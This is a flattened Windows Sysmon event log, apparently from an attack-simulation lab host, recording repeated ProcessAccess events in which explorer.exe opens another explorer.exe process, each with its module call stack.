16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 